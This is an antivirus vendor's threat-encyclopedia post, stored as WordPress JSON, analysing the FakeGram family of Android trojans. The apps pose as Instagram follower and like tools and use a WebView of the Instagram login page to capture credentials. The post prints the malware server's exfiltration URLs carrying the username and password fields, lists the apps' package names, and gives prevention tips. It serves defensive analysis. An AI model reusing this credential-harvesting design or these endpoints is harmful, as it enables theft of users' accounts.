{"id":82,"date":"2020-11-18T09:42:32","date_gmt":"2020-11-18T09:42:32","guid":{"rendered":"https:\/\/threats.amnpardaz.com\/en\/?p=82"},"modified":"2023-02-07T07:11:52","modified_gmt":"2023-02-07T07:11:52","slug":"trojan-android-phishing-fakegram","status":"publish","type":"post","link":"https:\/\/threats.amnpardaz.com\/en\/2020\/11\/18\/trojan-android-phishing-fakegram\/","title":{"rendered":"Trojan.Android.Phishing.FakeGram"},"content":{"rendered":"<h2>General Explanation<\/h2>\n<p><strong>Type<\/strong>: Trojan<\/p>\n<p><strong>Degree of destruction<\/strong>: average<\/p>\n<p><strong>Prevalence<\/strong>: average<\/p>\n<h3>What is Phishing?<\/h3>\n<p>Phishing is a social engineering technique in which an attacker will mislead users with it and will steal his\/her personal information such as user name, password, bank card number, internet password, and CVV2. Conventional and current methods of phishing involve using charming emails with infected links, social networks, and bank payment ports, and also using login pages of popular applications for stealing user\u2019s information of this set of applications. There are various methods for phishing attacks. One of these methods is that attackers design a page similar to popular functional applications such as (Instagram) and will replace it with the main page. So users enter their account information wrongfully but in principle, this critical information will be sent to a malware server for further abuse.<\/p>\n<h3>What is the FakeGram malware family?<\/h3>\n<p>There are many examples of this Iranian malware family in Caf\u00e9 Bazar with different names which generally act as follows:<\/p>\n<p>The main activity of applications as a login page is designed to be exactly similar to an Instagram original application so forces users to reveal details of logging in. victims after entering their account information (email address and password) immediately will send this information to the server, which is remotely controlled by the attacker. Eventually, users will encounter this message on the fake page as \u201cthe password is incorrect\u201d, when this level is accomplished.<\/p>\n<p>It is noteworthy to mention that, when installing this application, the case that is seen as an explanation is that \u201cyour username and password are not accessible by us and you will be directly logged in to Instagram\u201d.<\/p>\n<p>Although this application will steal the password of the user in addition to attaining access to it. Thus, after installing the application the login page of Instagram will be load as a web page (a web view which javascript will run in it), but by adding javascript to it, the user\u2019s password will be extracted and sent to the infected server (the following address)<\/p>\n<p><code>http:\/\/v1.lkbgr.com\/users\/load.php?user_name=test_username&amp;apk=103&amp;tut=15777755559<\/code><\/p>\n<p><code>Main Instagram account)):user_name<\/code><\/p>\n<p><code>tut: Password (main Instagram account)<\/code><\/p>\n<p><code>apk: internal version<\/code><\/p>\n<h2>Technical Explanation<\/h2>\n<p>As soon as setting up the application, first, it will be checked if the user is connected to the internet otherwise there will be a message shown to the user as \u201cyou are not connected yet\u201d so that the user connects to the internet. Thus malware can easily be connected with the infected server in the background.to load the first activity, a request will be sent to <a href=\"http:\/\/v1.lkbgr.com\/users\/start.php?api=19&amp;user=%DA%A9%D8%A7%D8%B1%D8%A8%D8\">http:\/\/v1.lkbgr.com\/users\/start.php?api=19&amp;user=%DA%A9%D8%A7%D8%B1%D8%A8%D8<\/a> path and this is the page that will open as the main activity for the user; the content of this page includes a button with the text \u201center by Instagram\u201d. In the following, AutherizationUser activity will be called and the packagename of the application and its version will be checked so it can show a proper message to the user.<\/p>\n<p>The reason is that there are many similar applications such as Instagram follower taker, Instagram comment taker, a member in member, install star, etc. belonging to Andromeda Company, so to show a proper message and update the application, this initial checking must be done.<\/p>\n<p>The activities shown to the user are a web view that the javascript will load in its background. The information that should be shown is sent to the user from <a href=\"http:\/\/v1.lkbgr.com\/\">http:\/\/v1.lkbgr.com\/<\/a> server. To users do not notice this issue, the malware author will hide the desired URL. After sending a request to the desired address, in response, the page that will be sent to the user is \u2018https:\/\/www.instagram.com\/accounts\/login\/?force_classic_login\u201d.<\/p>\n<p>This page is the old login page of Instagram but has no code in its background. Normally (if the application is properly working) as soon as entering your account information, this information must be encrypted and sent to the Instagram server but the case that we view in this set of infected applications is sending information (account name, password, and critical information of user\u2019s phone) to malware server. Malware authors by tricking users and booting fake Instagram login pages will easily access users\u2019 information.<\/p>\n<p>The Instagram user account information will be entered and by clicking on the login option, this information will be sent to <a href=\"http:\/\/v1.lkbgr.com\/users\/load.php?user_name=test_username&amp;apk=103&amp;tut=15777755559\">http:\/\/v1.lkbgr.com\/users\/load.php?user_name=test_username&amp;apk=103&amp;tut=15777755559<\/a>. but in response to what is being sent to the user\u2019s phone from <a href=\"http:\/\/v1.lkbgr.com\/login\/req_redirect_2.php?un=username_test&amp;ui=-1&amp;apk=103%20HTTP\/1.1\">http:\/\/v1.lkbgr.com\/login\/req_redirect_2.php?un=username_test&amp;ui=-1&amp;apk=103 HTTP\/1.1<\/a> server to show, this message: \u201cusername or password is incorrect\u201d will be shown.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-84 aligncenter\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2020\/11\/55.png\" alt=\"\" width=\"833\" height=\"428\" \/><\/p>\n<p>As you can see, the request involves a csrftoken which is the specification related to sending or receiving data that are coded. A part of this data is coded by using the base64 algorithm and some of the other data are written in code separately from the encrypting algorithm. Malware author converts the data to encrypted data to hide it and prevent it from clear view.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-85\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2020\/11\/POST_login.png\" alt=\"\" width=\"1391\" height=\"298\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-86\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2020\/11\/Send_token-1.png\" alt=\"\" width=\"1379\" height=\"539\" \/><\/p>\n<h3>Other examples<\/h3>\n<p>Other produced application of Andromeda Company which are existed in Iranian markets such as \u201cCaf\u00e9 Bazar\u201d is as follows:<\/p>\n<table style=\"width: 100%;border-collapse: collapse\" border=\"1\">\n<tbody>\n<tr>\n<td style=\"width: 49.91%\" width=\"312\">Name of the application<\/td>\n<td style=\"width: 49.91%\" width=\"312\">Package name<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 49.91%\" width=\"312\">Adbin- (get view, site, and link)<\/td>\n<td style=\"width: 49.91%\" width=\"312\">ir.andromedaa.adbn<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 49.91%\" width=\"312\">Instagram: get like<\/td>\n<td style=\"width: 49.91%\" width=\"312\">ir.andromedaa.likebegir<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 49.91%\" width=\"312\">Instagram: get follower<\/td>\n<td style=\"width: 49.91%\" width=\"312\">ir.andromedaa.followerbegir<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 49.91%\" width=\"312\">ID list<\/td>\n<td style=\"width: 49.91%\" width=\"312\">ir.andromedaa.idlist<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 49.91%\" width=\"312\">Instagram: get comment<\/td>\n<td style=\"width: 49.91%\" width=\"312\">ir.ndrm.cmbegir<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 49.91%\" width=\"312\">Member in member (ozv dar ozv)<\/td>\n<td style=\"width: 49.91%\" width=\"312\">com.andromedaa.ozvbazdidgir<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 49.91%\" width=\"312\">Insta star<\/td>\n<td style=\"width: 49.91%\" width=\"312\">ir.andromedaa.instastar<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"ipt_kb_toc_559_6\">How to deal with this and disinfect the system<\/h2>\n<p><a href=\"https:\/\/padvish.com\/en-us\/Main\" target=\"_blank\" rel=\"noopener\">Padvish antivirus<\/a> will detect this malware and remove it from your system<\/p>\n<p><strong>Methods of preventing phone infection:<\/strong><\/p>\n<ol>\n<li style=\"min-height: 1.5em\">Avoid downloading and installing any application from unauthorized resources\/markets.<\/li>\n<li style=\"min-height: 1.5em\">Note the requested permissions, when installing the mobile application.<\/li>\n<li style=\"min-height: 1.5em\">Continuously back up your saved data and files.<\/li>\n<li style=\"min-height: 1.5em\">Do not use an unofficial version of applications. Applications such as Telegram, and Instagram have many unofficial versions and most of them release through Telegram channels.<\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"<p>General Explanation Type: Trojan Degree of destruction: average Prevalence: average What is Phishing? Phishing is a social engineering technique in which an attacker will mislead users with it and will steal his\/her personal information such as user name, password, bank card number, internet password, and CVV2. Conventional and current methods of phishing involve using charming&hellip;<\/p>\n","protected":false},"author":16,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[24],"class_list":["post-82","post","type-post","status-publish","format-standard","hentry","category-trojan","tag-android"],"_links":{"self":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/82","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/comments?post=82"}],"version-history":[{"count":6,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/82\/revisions"}],"predecessor-version":[{"id":1228,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/82\/revisions\/1228"}],"wp:attachment":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/media?parent=82"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/categories?post=82"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/tags?post=82"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}